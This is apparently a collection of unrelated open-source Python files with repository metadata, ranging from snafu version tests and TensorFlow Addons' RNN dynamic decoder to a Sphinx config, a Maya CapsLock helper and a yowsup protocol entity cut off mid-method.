version = snafu.versions.get_version('3.4', force_32=False)
assert version == snafu.versions.CPythonMSIVersion(
name='3.4',
url='https://www.python.org/ftp/python/3.4.4/python-3.4.4.amd64.msi',
md5_sum='963f67116935447fad73e09cc561c713',
version_info=(3, 4, 4),
)
def test_get_version_cpython_msi_switch():
version = snafu.versions.get_version('3.4', force_32=True)
assert version == snafu.versions.CPythonMSIVersion(
name='3.4',
url='https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi',
md5_sum='e96268f7042d2a3d14f7e23b2535738b',
version_info=(3, 4, 4),
)
def test_get_version_cpython():
version = snafu.versions.get_version('3.5', force_32=False)
assert version == snafu.versions.CPythonVersion(
name='3.5',
url='https://www.python.org/ftp/python/3.5.4/python-3.5.4-amd64.exe',
md5_sum='4276742a4a75a8d07260f13fe956eec4',
version_info=(3, 5, 4),
)
def test_get_version_cpython_switch():
version = snafu.versions.get_version('3.5', force_32=True)
assert version == snafu.versions.CPythonVersion(
name='3.5-32',
url='https://www.python.org/ftp/python/3.5.4/python-3.5.4.exe',
md5_sum='9693575358f41f452d03fd33714f223f',
version_info=(3, 5, 4),
forced_32=True,
)
def test_get_version_not_found():
with pytest.raises(snafu.versions.VersionNotFoundError) as ctx:
snafu.versions.get_version('2.8', force_32=False)
assert str(ctx.value) == '2.8'
@pytest.mark.parametrize('name, force_32, result', [
('3.6', False, 'Python 3.6'),
('3.6', True, 'Python 3.6-32'),
('3.4', False, 'Python 3.4'),
('3.4', True, 'Python 3.4'),
])
def test_str(name, force_32, result):
version = snafu.versions.get_version(name, force_32=force_32)
assert str(version) == result
@pytest.mark.parametrize('name, force_32, cmd', [
('3.6', False, 'python3.exe'),
('3.6', True, 'python3.exe'),
('2.7', False, 'python2.exe'),
('2.7', True, 'python2.exe'),
])
def test_python_major_command(mocker, name, force_32, cmd):
mocker.patch.object(snafu.versions, 'configs', **{
'get_scripts_dir_path.return_value': pathlib.Path(),
})
version = snafu.versions.get_version(name, force_32=force_32)
assert version.python_major_command == pathlib.Path(cmd)
@pytest.mark.parametrize('name, force_32, result', [
('3.6', False, '3.6'),
('3.6', True, '3.6'),
('3.4', False, '3.4'),
('3.4', True, '3.4'),
])
def test_arch_free_name(name, force_32, result):
version = snafu.versions.get_version(name, force_32=force_32)
assert version.arch_free_name == result
@pytest.mark.parametrize('name, force_32, result', [
('3.6', False, {'3.6'}),
('3.6', True, {'3.6', '3.6-32'}),
('3.6-32', False, {'3.6-32'}),
('3.4', False, {'3.4'}),
('3.4', True, {'3.4'}),
])
def test_script_version_names(name, force_32, result):
version = snafu.versions.get_version(name, force_32=force_32)
assert version.script_version_names == result
def test_is_installed(tmpdir, mocker):
mock_metadata = mocker.patch.object(snafu.versions, 'metadata', **{
'get_install_path.return_value': pathlib.Path(str(tmpdir)),
})
version = snafu.versions.get_version('3.6', force_32=False)
assert version.is_installed()
mock_metadata.get_install_path.assert_called_once_with('3.6')
|
uranusjr/snafu
|
tests/test_versions.py
|
Python
|
isc
| 4,596 | 0 |
import json
from os.path import join, dirname
from jsonschema import validate
SCHEMA_FILE = "normandy-schema.json"
def assert_valid_schema(data):
schema = _load_json_schema()
return validate(data, schema)
def _load_json_schema():
relative_path = join("schemas", SCHEMA_FILE)
absolute_path = join(dirname(__file__), relative_path)
with open(absolute_path) as schema_file:
return json.loads(schema_file.read())
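# Usage sketch (hypothetical payload): validate() raises
# jsonschema.exceptions.ValidationError when the data does not match the
# bundled schema, so a bare call doubles as an assertion.
#
#   assert_valid_schema({'recipes': []})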
|
mozilla/normandy
|
contract-tests/v3_api/support/assertions.py
|
Python
|
mpl-2.0
| 461 | 0 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Base classes and functions for dynamic decoding."""
import abc
import tensorflow as tf
from tensorflow_addons.utils.types import TensorLike
from typeguard import typechecked
from typing import Any, Optional, Tuple, Union
# TODO: Find public API alternatives to these
from tensorflow.python.ops import control_flow_util
class Decoder(metaclass=abc.ABCMeta):
"""An RNN Decoder abstract interface object.
Concepts used by this interface:
- `inputs`: (structure of) tensors and TensorArrays that is passed as input
to the RNN cell composing the decoder, at each time step.
- `state`: (structure of) tensors and TensorArrays that is passed to the
RNN cell instance as the state.
- `finished`: boolean tensor telling whether each sequence in the batch is
finished.
- `training`: boolean whether it should behave in training mode or in
inference mode.
- `outputs`: instance of `tfa.seq2seq.BasicDecoderOutput`. Result of the decoding, at
each time step.
"""
@property
def batch_size(self):
"""The batch size of input values."""
raise NotImplementedError
@property
def output_size(self):
"""A (possibly nested tuple of...) integer[s] or `TensorShape`
object[s]."""
raise NotImplementedError
@property
def output_dtype(self):
"""A (possibly nested tuple of...) dtype[s]."""
raise NotImplementedError
@abc.abstractmethod
def initialize(self, name=None):
"""Called before any decoding iterations.
        This method must compute initial input values and initial state.
Args:
name: Name scope for any created operations.
Returns:
`(finished, initial_inputs, initial_state)`: initial values of
'finished' flags, inputs and state.
"""
raise NotImplementedError
@abc.abstractmethod
def step(self, time, inputs, state, training=None, name=None):
"""Called per step of decoding (but only once for dynamic decoding).
Args:
time: Scalar `int32` tensor. Current step number.
inputs: RNN cell input (possibly nested tuple of) tensor[s] for this
time step.
state: RNN cell state (possibly nested tuple of) tensor[s] from
previous time step.
training: Python boolean. Indicates whether the layer should behave
in training mode or in inference mode. Only relevant
when `dropout` or `recurrent_dropout` is used.
name: Name scope for any created operations.
Returns:
`(outputs, next_state, next_inputs, finished)`: `outputs` is an
object containing the decoder output, `next_state` is a (structure
of) state tensors and TensorArrays, `next_inputs` is the tensor that
should be used as input for the next step, `finished` is a boolean
tensor telling whether the sequence is complete, for each sequence in
the batch.
"""
raise NotImplementedError
def finalize(self, outputs, final_state, sequence_lengths):
raise NotImplementedError
@property
def tracks_own_finished(self):
"""Describes whether the Decoder keeps track of finished states.
Most decoders will emit a true/false `finished` value independently
at each time step. In this case, the `tfa.seq2seq.dynamic_decode` function keeps
track of which batch entries are already finished, and performs a
logical OR to insert new batches to the finished set.
Some decoders, however, shuffle batches / beams between time steps and
`tfa.seq2seq.dynamic_decode` will mix up the finished state across these entries
because it does not track the reshuffle across time steps. In this
case, it is up to the decoder to declare that it will keep track of its
own finished state by setting this property to `True`.
Returns:
Python bool.
"""
return False
class BaseDecoder(tf.keras.layers.Layer):
"""An RNN Decoder that is based on a Keras layer.
Concepts used by this interface:
- `inputs`: (structure of) Tensors and TensorArrays that is passed as input
to the RNN cell composing the decoder, at each time step.
- `state`: (structure of) Tensors and TensorArrays that is passed to the
RNN cell instance as the state.
- `memory`: tensor that is usually the full output of the encoder, which
will be used for the attention wrapper for the RNN cell.
- `finished`: boolean tensor telling whether each sequence in the batch is
finished.
- `training`: boolean whether it should behave in training mode or in
inference mode.
- `outputs`: instance of `tfa.seq2seq.BasicDecoderOutput`. Result of the decoding, at
each time step.
"""
@typechecked
def __init__(
self,
output_time_major: bool = False,
impute_finished: bool = False,
maximum_iterations: Optional[TensorLike] = None,
parallel_iterations: int = 32,
swap_memory: bool = False,
**kwargs,
):
self.output_time_major = output_time_major
self.impute_finished = impute_finished
self.maximum_iterations = maximum_iterations
self.parallel_iterations = parallel_iterations
self.swap_memory = swap_memory
super().__init__(**kwargs)
def call(self, inputs, initial_state=None, training=None, **kwargs):
init_kwargs = kwargs
init_kwargs["initial_state"] = initial_state
return dynamic_decode(
self,
output_time_major=self.output_time_major,
impute_finished=self.impute_finished,
maximum_iterations=self.maximum_iterations,
parallel_iterations=self.parallel_iterations,
swap_memory=self.swap_memory,
training=training,
decoder_init_input=inputs,
decoder_init_kwargs=init_kwargs,
)
@property
def batch_size(self):
"""The batch size of input values."""
raise NotImplementedError
@property
def output_size(self):
"""A (possibly nested tuple of...) integer[s] or `TensorShape`
object[s]."""
raise NotImplementedError
@property
def output_dtype(self):
"""A (possibly nested tuple of...) dtype[s]."""
raise NotImplementedError
def initialize(self, inputs, initial_state=None, **kwargs):
"""Called before any decoding iterations.
        This method must compute initial input values and initial state.
Args:
inputs: (structure of) tensors that contains the input for the
decoder. In the normal case, it's a tensor with shape
[batch, timestep, embedding].
initial_state: (structure of) tensors that contains the initial state
for the RNN cell.
**kwargs: Other arguments that are passed in from layer.call()
                method. It could contain items like the input
                `sequence_length`, or masking for the input.
Returns:
`(finished, initial_inputs, initial_state)`: initial values of
'finished' flags, inputs and state.
"""
raise NotImplementedError
def step(self, time, inputs, state, training):
"""Called per step of decoding (but only once for dynamic decoding).
Args:
time: Scalar `int32` tensor. Current step number.
inputs: RNN cell input (possibly nested tuple of) tensor[s] for this
time step.
state: RNN cell state (possibly nested tuple of) tensor[s] from
previous time step.
training: Python boolean. Indicates whether the layer should
behave in training mode or in inference mode.
Returns:
`(outputs, next_state, next_inputs, finished)`: `outputs` is an
object containing the decoder output, `next_state` is a
(structure of) state tensors and TensorArrays, `next_inputs` is the
tensor that should be used as input for the next step, `finished` is
a boolean tensor telling whether the sequence is complete, for each
sequence in the batch.
"""
raise NotImplementedError
def finalize(self, outputs, final_state, sequence_lengths):
raise NotImplementedError
@property
def tracks_own_finished(self):
"""Describes whether the Decoder keeps track of finished states.
Most decoders will emit a true/false `finished` value independently
at each time step. In this case, the `tfa.seq2seq.dynamic_decode` function keeps
track of which batch entries are already finished, and performs a
logical OR to insert new batches to the finished set.
Some decoders, however, shuffle batches / beams between time steps and
`tfa.seq2seq.dynamic_decode` will mix up the finished state across these entries
because it does not track the reshuffle across time steps. In this
case, it is up to the decoder to declare that it will keep track of its
own finished state by setting this property to `True`.
Returns:
Python bool.
"""
return False
# TODO(scottzhu): Add build/get_config/from_config and other layer methods.
@typechecked
def dynamic_decode(
decoder: Union[Decoder, BaseDecoder],
output_time_major: bool = False,
impute_finished: bool = False,
maximum_iterations: Optional[TensorLike] = None,
parallel_iterations: int = 32,
swap_memory: bool = False,
training: Optional[bool] = None,
scope: Optional[str] = None,
enable_tflite_convertible: bool = False,
**kwargs,
) -> Tuple[Any, Any, Any]:
"""Runs dynamic decoding with a decoder.
Calls `initialize()` once and `step()` repeatedly on the decoder object.
Args:
decoder: A `tfa.seq2seq.Decoder` or `tfa.seq2seq.BaseDecoder` instance.
output_time_major: Python boolean. Default: `False` (batch major). If
`True`, outputs are returned as time major tensors (this mode is
faster). Otherwise, outputs are returned as batch major tensors (this
adds extra time to the computation).
impute_finished: Python boolean. If `True`, then states for batch
entries which are marked as finished get copied through and the
corresponding outputs get zeroed out. This causes some slowdown at
each time step, but ensures that the final state and outputs have
the correct values and that backprop ignores time steps that were
marked as finished.
maximum_iterations: A strictly positive `int32` scalar, the maximum
allowed number of decoding steps. Default is `None` (decode until the
decoder is fully done).
parallel_iterations: Argument passed to `tf.while_loop`.
swap_memory: Argument passed to `tf.while_loop`.
training: Python boolean. Indicates whether the layer should behave
in training mode or in inference mode. Only relevant
when `dropout` or `recurrent_dropout` is used.
scope: Optional name scope to use.
enable_tflite_convertible: Python boolean. If `True`, then the variables
of `TensorArray` become of 1-D static shape. Also zero pads in the
output tensor will be discarded. Default: `False`.
        **kwargs: dict, other keyword arguments for dynamic_decode. It may
          contain arguments used to initialize a `BaseDecoder`, which takes
          all of its tensor inputs during call().
Returns:
`(final_outputs, final_state, final_sequence_lengths)`.
Raises:
ValueError: if `maximum_iterations` is provided but is not a scalar.
"""
with tf.name_scope(scope or "decoder"):
is_xla = (
not tf.executing_eagerly()
and control_flow_util.GraphOrParentsInXlaContext(
tf.compat.v1.get_default_graph()
)
)
if maximum_iterations is not None:
maximum_iterations = tf.convert_to_tensor(
maximum_iterations, dtype=tf.int32, name="maximum_iterations"
)
if maximum_iterations.shape.ndims != 0:
raise ValueError("maximum_iterations must be a scalar")
tf.debugging.assert_greater(
maximum_iterations,
0,
message="maximum_iterations should be greater than 0",
)
elif is_xla:
raise ValueError("maximum_iterations is required for XLA compilation.")
if isinstance(decoder, Decoder):
initial_finished, initial_inputs, initial_state = decoder.initialize()
else:
# For BaseDecoder that takes tensor inputs during call.
decoder_init_input = kwargs.pop("decoder_init_input", None)
decoder_init_kwargs = kwargs.pop("decoder_init_kwargs", {})
initial_finished, initial_inputs, initial_state = decoder.initialize(
decoder_init_input, **decoder_init_kwargs
)
if enable_tflite_convertible:
# Assume the batch_size = 1 for inference.
# So we can change 2-D TensorArray into 1-D by reshaping it.
tf.debugging.assert_equal(
decoder.batch_size,
1,
message="TFLite conversion requires a batch size of 1",
)
zero_outputs = tf.nest.map_structure(
lambda shape, dtype: tf.reshape(
tf.zeros(_prepend_batch(decoder.batch_size, shape), dtype=dtype),
[-1],
),
decoder.output_size,
decoder.output_dtype,
)
else:
zero_outputs = tf.nest.map_structure(
lambda shape, dtype: tf.zeros(
_prepend_batch(decoder.batch_size, shape), dtype=dtype
),
decoder.output_size,
decoder.output_dtype,
)
if maximum_iterations is not None:
initial_finished = tf.logical_or(initial_finished, 0 >= maximum_iterations)
initial_sequence_lengths = tf.zeros_like(initial_finished, dtype=tf.int32)
initial_time = tf.constant(0, dtype=tf.int32)
def _shape(batch_size, from_shape):
if not isinstance(from_shape, tf.TensorShape) or from_shape.ndims == 0:
return None
else:
batch_size = tf.get_static_value(
tf.convert_to_tensor(batch_size, name="batch_size")
)
return tf.TensorShape([batch_size]).concatenate(from_shape)
dynamic_size = maximum_iterations is None or not is_xla
# The dynamic shape `TensorArray` is not allowed in TFLite yet.
dynamic_size = dynamic_size and (not enable_tflite_convertible)
def _create_ta(s, d):
if enable_tflite_convertible:
# TFLite requires 1D element_shape.
if isinstance(s, tf.TensorShape) and s.ndims == 0:
s = (1,)
element_shape = s
else:
element_shape = _shape(decoder.batch_size, s)
return tf.TensorArray(
dtype=d,
size=0 if dynamic_size else maximum_iterations,
dynamic_size=dynamic_size,
element_shape=element_shape,
)
initial_outputs_ta = tf.nest.map_structure(
_create_ta, decoder.output_size, decoder.output_dtype
)
def condition(
unused_time,
unused_outputs_ta,
unused_state,
unused_inputs,
finished,
unused_sequence_lengths,
):
return tf.logical_not(tf.reduce_all(finished))
def body(time, outputs_ta, state, inputs, finished, sequence_lengths):
"""Internal while_loop body.
Args:
time: scalar int32 tensor.
outputs_ta: structure of TensorArray.
state: (structure of) state tensors and TensorArrays.
inputs: (structure of) input tensors.
finished: bool tensor (keeping track of what's finished).
sequence_lengths: int32 tensor (keeping track of time of finish).
Returns:
`(time + 1, outputs_ta, next_state, next_inputs, next_finished,
next_sequence_lengths)`.
"""
(next_outputs, decoder_state, next_inputs, decoder_finished) = decoder.step(
time, inputs, state, training
)
decoder_state_sequence_lengths = False
if decoder.tracks_own_finished:
next_finished = decoder_finished
lengths = getattr(decoder_state, "lengths", None)
if lengths is not None:
# sequence lengths are provided by decoder_state.lengths;
# overwrite our sequence lengths.
decoder_state_sequence_lengths = True
sequence_lengths = tf.cast(lengths, tf.int32)
else:
next_finished = tf.logical_or(decoder_finished, finished)
if decoder_state_sequence_lengths:
# Just pass something through the loop; at the next iteration
# we'll pull the sequence lengths from the decoder_state again.
next_sequence_lengths = sequence_lengths
else:
next_sequence_lengths = tf.where(
tf.logical_not(finished),
tf.fill(tf.shape(sequence_lengths), time + 1),
sequence_lengths,
)
tf.nest.assert_same_structure(state, decoder_state)
tf.nest.assert_same_structure(outputs_ta, next_outputs)
tf.nest.assert_same_structure(inputs, next_inputs)
# Zero out output values past finish
if impute_finished:
def zero_out_finished(out, zero):
if finished.shape.rank < zero.shape.rank:
broadcast_finished = tf.broadcast_to(
tf.expand_dims(finished, axis=-1), zero.shape
)
return tf.where(broadcast_finished, zero, out)
else:
return tf.where(finished, zero, out)
emit = tf.nest.map_structure(
zero_out_finished, next_outputs, zero_outputs
)
else:
emit = next_outputs
# Copy through states past finish
def _maybe_copy_state(new, cur):
# TensorArrays and scalar states get passed through.
if isinstance(cur, tf.TensorArray):
pass_through = True
else:
new.set_shape(cur.shape)
pass_through = new.shape.ndims == 0
if not pass_through:
broadcast_finished = tf.broadcast_to(
tf.expand_dims(finished, axis=-1), new.shape
)
return tf.where(broadcast_finished, cur, new)
else:
return new
if impute_finished:
next_state = tf.nest.map_structure(
_maybe_copy_state, decoder_state, state
)
else:
next_state = decoder_state
if enable_tflite_convertible:
# Reshape to 1-D.
emit = tf.nest.map_structure(lambda x: tf.reshape(x, [-1]), emit)
outputs_ta = tf.nest.map_structure(
lambda ta, out: ta.write(time, out), outputs_ta, emit
)
return (
time + 1,
outputs_ta,
next_state,
next_inputs,
next_finished,
next_sequence_lengths,
)
res = tf.while_loop(
condition,
body,
loop_vars=(
initial_time,
initial_outputs_ta,
initial_state,
initial_inputs,
initial_finished,
initial_sequence_lengths,
),
parallel_iterations=parallel_iterations,
maximum_iterations=maximum_iterations,
swap_memory=swap_memory,
)
final_outputs_ta = res[1]
final_state = res[2]
final_sequence_lengths = res[5]
final_outputs = tf.nest.map_structure(lambda ta: ta.stack(), final_outputs_ta)
try:
final_outputs, final_state = decoder.finalize(
final_outputs, final_state, final_sequence_lengths
)
except NotImplementedError:
pass
if not output_time_major:
if enable_tflite_convertible:
# Reshape the output to the original shape.
def _restore_batch(x):
return tf.expand_dims(x, [1])
final_outputs = tf.nest.map_structure(_restore_batch, final_outputs)
final_outputs = tf.nest.map_structure(_transpose_batch_time, final_outputs)
return final_outputs, final_state, final_sequence_lengths
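# Illustrative sketch (not part of the original module): a minimal way to
# drive `dynamic_decode` with a `tfa.seq2seq.BasicDecoder`. The layer sizes,
# sampler choice and shapes below are assumptions for demonstration only.
def _example_dynamic_decode():
    import tensorflow_addons as tfa

    batch_size, max_time, units, vocab = 4, 7, 16, 100
    inputs = tf.random.normal([batch_size, max_time, units])
    cell = tf.keras.layers.LSTMCell(units)
    decoder = tfa.seq2seq.BasicDecoder(
        cell, tfa.seq2seq.TrainingSampler(),
        output_layer=tf.keras.layers.Dense(vocab),
    )
    # `decoder_init_input`/`decoder_init_kwargs` are forwarded to
    # `decoder.initialize()` because BasicDecoder is a BaseDecoder.
    return dynamic_decode(
        decoder,
        maximum_iterations=max_time,
        decoder_init_input=inputs,
        decoder_init_kwargs={
            "initial_state": cell.get_initial_state(inputs[:, 0]),
            "sequence_length": tf.fill([batch_size], max_time),
        },
    )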
def _prepend_batch(batch_size, shape):
"""Prepends the batch dimension to the shape.
If the batch_size value is known statically, this function returns a
TensorShape, otherwise a Tensor.
"""
if isinstance(batch_size, tf.Tensor):
static_batch_size = tf.get_static_value(batch_size)
else:
static_batch_size = batch_size
if static_batch_size is None:
return tf.concat(([batch_size], shape), axis=0)
return [static_batch_size] + shape
def _transpose_batch_time(tensor):
"""Transposes the batch and time dimension of tensor if its rank is at
least 2."""
shape = tensor.shape
if shape.rank is not None and shape.rank < 2:
return tensor
perm = tf.concat(([1, 0], tf.range(2, tf.rank(tensor))), axis=0)
return tf.transpose(tensor, perm)
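# Illustrative, not part of the original module: [batch, time, ...] tensors
# become [time, batch, ...], while rank-0/1 tensors pass through unchanged.
def _example_transpose_batch_time():
    x = tf.zeros([2, 3, 4])            # [batch=2, time=3, depth=4]
    return _transpose_batch_time(x)    # shape (3, 2, 4)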
|
tensorflow/addons
|
tensorflow_addons/seq2seq/decoder.py
|
Python
|
apache-2.0
| 23,035 | 0.000781 |
# author : Etienne THIERY
from matgen import *
import random
import numpy
def test_symmetricPositiveDefinite():
for i in range(10):
print(".", end="", flush=True)
size = random.randint(400, 500)
maxVal = random.randint(0, 1000)
M = symmetricPositiveDefinite(size, maxVal)
if not (isSymmetric(M) and isDefinitePositive(M)):
return False
return True
def test_symmetricSparsePositiveDefinite():
for i in range(10):
print(".", end="", flush=True)
size = random.randint(400, 500)
maxVal = random.randint(0, 1000)
nbZeros = random.randint(0, size*(size-1))
M = symmetricSparsePositiveDefinite(size, nbZeros, maxVal)
if not (isSymmetric(M) and isDefinitePositive(M) and abs(numberOfZeros(M)-nbZeros) <= 1):
return False
return True
def numberOfZeros(M):
count = 0
for line in M:
for coeff in line:
if coeff == 0:
count+=1
return count
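# Hedged sketch (not part of the original tests): one plausible numpy
# implementation of the checks imported from matgen; the real matgen module
# may differ.
def _example_checks(M):
    A = numpy.array(M)
    symmetric = numpy.allclose(A, A.T)
    # A symmetric matrix is positive definite iff all eigenvalues are > 0.
    positive_definite = symmetric and bool(numpy.all(numpy.linalg.eigvalsh(A) > 0))
    return symmetric, positive_definite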
def printTest(test_func):
print("Testing " + test_func.__name__[5:] + " : ", end="", flush=True)
print(("" if test_func() else "un") + "expected behaviour", flush=True)
printTest(test_symmetricPositiveDefinite)
printTest(test_symmetricSparsePositiveDefinite)
|
ethiery/heat-solver
|
trunk/test_matgen.py
|
Python
|
mit
| 1,289 | 0.006206 |
# -*- coding: utf-8 -*-
#
# HelixMC documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 21 15:51:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
#import sys
#import os
import time
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
#sys.path.insert(0, os.path.abspath('sphinxext'))
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.autosummary',
'sphinx.ext.mathjax', 'numpydoc'
]
#Autodoc Stuffs
autosummary_generate = True
numpydoc_show_class_members = False
def skip(app, what, name, obj, skip, options):
if name == "__init__" or name == '__call__':
return False
return skip
def setup(app):
app.connect("autodoc-skip-member", skip)
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'HelixMC'
copyright = u'2013-%s, Fang-Chieh Chou (GPLv3 Licence)' % time.strftime('%Y')
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
import helixmc
version = helixmc.__version__
# The full version, including alpha/beta/rc tags.
release = version
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_trees = ['_templates']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
#pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'default'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = '_static/logo.png'
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '_static/icon.ico'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'HelixMCdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [(
'index', 'HelixMC.tex', u'HelixMC Documentation',
u'Fang-Chieh Chou', 'manual'
)]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = '_static/logo.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output -------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'helixmc', u'HelixMC Documentation',
[u'Fang-Chieh Chou'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [(
'index', 'HelixMC', u'HelixMC Documentation',
u'Fang-Chieh Chou', 'HelixMC', 'One line description of project.',
'Miscellaneous'
)]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
trim_doctest_flags = True
|
fcchou/HelixMC
|
doc/source/conf.py
|
Python
|
gpl-3.0
| 8,069 | 0.005453 |
from syzoj.models import JudgeState
from syzoj import db
db.create_all()
all_judge = JudgeState.query.all()
for item in all_judge:
item.update_userac_info()
|
cdcq/jzyzj
|
syzoj/update_assistant/misc.py
|
Python
|
mit
| 163 | 0 |
import subprocess as Subprocess
import pymel.all as pm
class CapsDisabler(object):
def __init__(self, parentRef, go=False):
self.parentRef = parentRef
self.ini = self.parentRef.ini
self.conf = self.ini.conf
self.enabled = False
self.autohotkeyProcess = None
if go==True:
self.go()
def go(self):
try:
if int( self.ini.getItem("disable_capslock") ) == 1:
self.enabled = True
else:
#print("Hotkeys not enabled.")
pass
except:
print("\n Could not start CapsLock disabling system or could "
"not find info on it's configuration, perhaps because of "
"missing info in the ini file. \n")
if self.enabled:
self.disableCapslock()
def killAutohotkeyProcess(self):
if isinstance( self.autohotkeyProcess, Subprocess.Popen ):
try:
self.autohotkeyProcess.kill()
except:
                print( "Autohotkey process not stopped. Perhaps it had "
                    "not been started.")
self.autohotkeyProcess = None
else:
self.autohotkeyProcess = None
def disableCapslock(self):
self.killAutohotkeyProcess()
self.autohotkeyProcess = None
self.autohotkeyProcess = Subprocess.Popen( self.parentRef.env.conf.autohotkey_command )
def startDisablingCapslock(self):
self.disableCapslock()
def stopDisablingCapslock(self):
self.killAutohotkeyProcess()
def setDisableCaplockOn(self):
print( "pretending to set disable_capslock to ON" )
#self.ini.setItem( disable_capslock, 1 ) ##untested code
pass
def setDisableCapslockOff(self):
print( "pretending to set disable_capslock to OFF" )
#self.ini.setItem( disable_capslock, 0 )
pass
|
joetainment/mmmmtools
|
MmmmToolsMod/Dynamic/CapsDisabler.py
|
Python
|
gpl-3.0
| 2,060 | 0.019417 |
from yowsup.structs import ProtocolEntity, ProtocolTreeNode
class IqProtocolEntity(ProtocolEntity):
'''
<iq type="{{get | set}}" id="{{id}}" xmlns="{{xmlns}}" to="{{TO}}" from="{{FROM}}">
</iq>
'''
TYPE_SET = "set"
TYPE_GET = "get"
TYPE_ERROR = "error"
TYPE_RESULT = "result"
TYPE_DELETE = "delete"
TYPES = (TYPE_SET, TYPE_GET, TYPE_RESULT, TYPE_ERROR, TYPE_DELETE)
def __init__(self, xmlns = None, _id = None, _type = None, to = None, _from = None):
super(IqProtocolEntity, self).__init__("iq")
assert _type in self.__class__.TYPES, "Iq of type %s is not implemented, can accept only (%s)" % (_type," | ".join(self.__class__.TYPES))
assert not to or not _from, "Can't set from and to at the same time"
self._id = self._generateId(True) if _id is None else _id
self._from = _from
self._type = _type
self.xmlns = xmlns
self.to = to
def getId(self):
return self._id
def getType(self):
return self._type
def getXmlns(self):
return self.xmlns
def getFrom(self, full = True):
return self._from if full else self._from.split('@')[0]
def getTo(self):
return self.to
def toProtocolTreeNode(self):
attribs = {
"id" : self._id,
"type" : self._type
}
if self.xmlns:
attribs["xmlns"] = self.xmlns
